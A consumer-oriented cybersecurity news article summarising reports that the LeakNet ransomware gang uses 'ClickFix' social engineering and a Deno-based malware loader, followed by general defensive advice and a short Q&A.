Cybersecurity

New Ransomware Targets Businesses with Stealthy Techniques

Mar 18, 2026 1 min read by Ciro Simone Irmici
New Ransomware Targets Businesses with Stealthy Techniques

The LeakNet ransomware gang is deploying stealthy new tactics, including ClickFix for initial access and a Deno runtime-based malware loader, to infiltrate corporate networks and encrypt data, posing a significant threat to businesses.

In today's interconnected digital landscape, the threat of ransomware continues to evolve, making it crucial for businesses and individuals alike to stay informed about the latest attack methods. The emergence of new, stealthier techniques employed by cybercriminals like the LeakNet ransomware gang highlights the constant need for vigilance and robust cybersecurity practices.

Understanding these sophisticated tactics is not just for IT professionals; it's essential for anyone who uses technology to protect their data, maintain productivity, and secure their digital life from increasingly cunning adversaries.

The Quick Take

  • Threat Actor: The LeakNet ransomware gang is behind these recent attacks.
  • Initial Access: They utilize a technique called 'ClickFix' to gain stealthy entry into corporate networks.
  • New Malware Loader: A novel loader based on the open-source Deno runtime (for JavaScript and TypeScript) is being deployed.
  • Target: Primarily focused on compromising corporate environments.
  • Goal: To encrypt data and extort payment, characteristic of ransomware operations.

What's Happening

The cybersecurity landscape is constantly shifting, with threat actors continuously developing new methods to bypass defenses. Recent reports from BleepingComputer highlight a significant evolution in the tactics of the LeakNet ransomware gang. This group is now employing a sophisticated combination of techniques to infiltrate and compromise corporate environments, making their attacks harder to detect and mitigate.

One of the key innovations in their arsenal is the use of the 'ClickFix' technique for initial access. While specific details of ClickFix are often proprietary to threat intelligence, it generally refers to an advanced social engineering or exploit method designed to trick users or bypass security controls during the initial infection phase. This allows the ransomware to gain a foothold in the target network without immediately raising alarms. Furthermore, once inside, LeakNet is deploying a new malware loader that leverages the Deno runtime. Deno is an open-source runtime environment for JavaScript and TypeScript, similar to Node.js. Its use in malware is relatively uncommon, which can make it less likely to be detected by traditional security solutions that are more attuned to common attack tools and frameworks. This novel approach enables the ransomware to load its malicious payload in a stealthier manner, complicating detection and forensic analysis for cybersecurity teams.

Why It Matters

This development is critically important for anyone operating in a digital environment, especially businesses. Ransomware attacks, in general, are devastating. They can lead to significant financial losses from ransoms paid, recovery costs, and business interruption. Beyond the immediate financial impact, ransomware can cause irreversible data loss, reputational damage, and severe operational disruptions that can take weeks or even months to resolve. The use of 'ClickFix' for initial access underscores the persistent threat of social engineering and the need for heightened user awareness, as human error remains one of the easiest ways for attackers to gain entry.

The integration of the Deno runtime into LeakNet's attack chain is particularly concerning from a cybersecurity perspective. Deno is a legitimate, modern, and often overlooked platform by security tools not specifically designed to monitor its execution. This means that traditional endpoint detection and response (EDR) or antivirus solutions might not flag Deno-based malicious scripts as readily as they would more common malware frameworks. This novel approach allows the ransomware to operate with a higher degree of stealth, giving it more time to establish persistence, move laterally within a network, and ultimately encrypt critical data before detection. For everyday users, while directly targeting corporate networks, the techniques used by ransomware gangs eventually trickle down or inspire other threats, making general awareness of these advanced evasion tactics crucial for digital hygiene.

What You Can Do

Protecting yourself and your organization from sophisticated threats like LeakNet requires a layered approach to cybersecurity. Here are actionable steps you can take:

  • Educate Employees on Phishing and Social Engineering: Regularly train staff to recognize and report suspicious emails, links, and communications. Since ClickFix often relies on user interaction, a well-informed workforce is your first line of defense.
  • Implement Robust Email Filtering: Utilize advanced email security solutions that can detect and block malicious attachments, links, and phishing attempts before they reach employee inboxes.
  • Maintain Regular, Offline Backups: Regularly back up all critical data to an offline or immutable storage solution. In the event of a ransomware attack, this allows you to restore your systems without paying a ransom.
  • Keep All Software and Operating Systems Updated: Promptly apply security patches and updates for all software, operating systems, and firmware. This closes known vulnerabilities that attackers might exploit for initial access.
  • Deploy Advanced Endpoint Detection and Response (EDR): Invest in EDR solutions that offer behavioral analysis and threat hunting capabilities, which can help detect unusual processes like Deno runtime being used in unexpected ways.
  • Implement Multi-Factor Authentication (MFA): Enable MFA on all accounts, especially for remote access, cloud services, and privileged accounts. This significantly reduces the risk of unauthorized access even if credentials are compromised.

Common Questions

Q: What exactly is ransomware?

A: Ransomware is a type of malicious software that encrypts a victim's files, rendering them inaccessible. Attackers then demand a ransom, usually in cryptocurrency, in exchange for a decryption key. If the ransom isn't paid, the data may be permanently lost or leaked.

Q: How does 'ClickFix' help ransomware?

A: 'ClickFix' refers to a technique used for initial access, often involving sophisticated social engineering or exploit methods. It's designed to bypass initial security layers or trick users into executing malicious code, helping the ransomware establish a stealthy foothold within a network.

Q: Why is using 'Deno runtime' significant for an attack?

A: Deno is a relatively new and less commonly used runtime for JavaScript/TypeScript, compared to older alternatives. Its novelty means that many traditional security tools might not have specific detection signatures or behavioral analytics for Deno, allowing malware using it to operate with increased stealth and evade detection more easily.

Sources

Based on content from BleepingComputer.

Key Takeaways

  • See the article for key details.
Original source
BleepingComputer
Read Original
Ciro Simone Irmici
Ciro Simone Irmici
Author, Digital Entrepreneur & AI Automation Creator
Written and curated by Ciro Simone Irmici · About TechPulse Daily

Related Articles

Patch Tuesday May 2026: AI Secures Your Software Faster
Patch Tuesday May 2026: AI Secures Your Software Faster Cybersecurity · May 13, 2026
AI Develops Zero-Day 2FA Bypass: A New Cyber Threat
AI Develops Zero-Day 2FA Bypass: A New Cyber Threat Cybersecurity · May 12, 2026
Mac Malware Delivered via Google Ads and Claude.ai Chats
Mac Malware Delivered via Google Ads and Claude.ai Chats Cybersecurity · May 11, 2026
Millions Download Fake Android Apps Stealing Money on Google Play
Millions Download Fake Android Apps Stealing Money on Google Play Cybersecurity · May 9, 2026
Ransomware Defenses: Why Your Backups Might Not Be Enough
Ransomware Defenses: Why Your Backups Might Not Be Enough Cybersecurity · May 8, 2026
Anti-DDoS Firm Accused of Attacking Brazilian ISPs
Anti-DDoS Firm Accused of Attacking Brazilian ISPs Cybersecurity · May 7, 2026

More from Cybersecurity

Patch Tuesday May 2026: AI Secures Your Software FasterAI Develops Zero-Day 2FA Bypass: A New Cyber ThreatMac Malware Delivered via Google Ads and Claude.ai ChatsMillions Download Fake Android Apps Stealing Money on Google PlayRansomware Defenses: Why Your Backups Might Not Be Enough

View all Cybersecurity articles →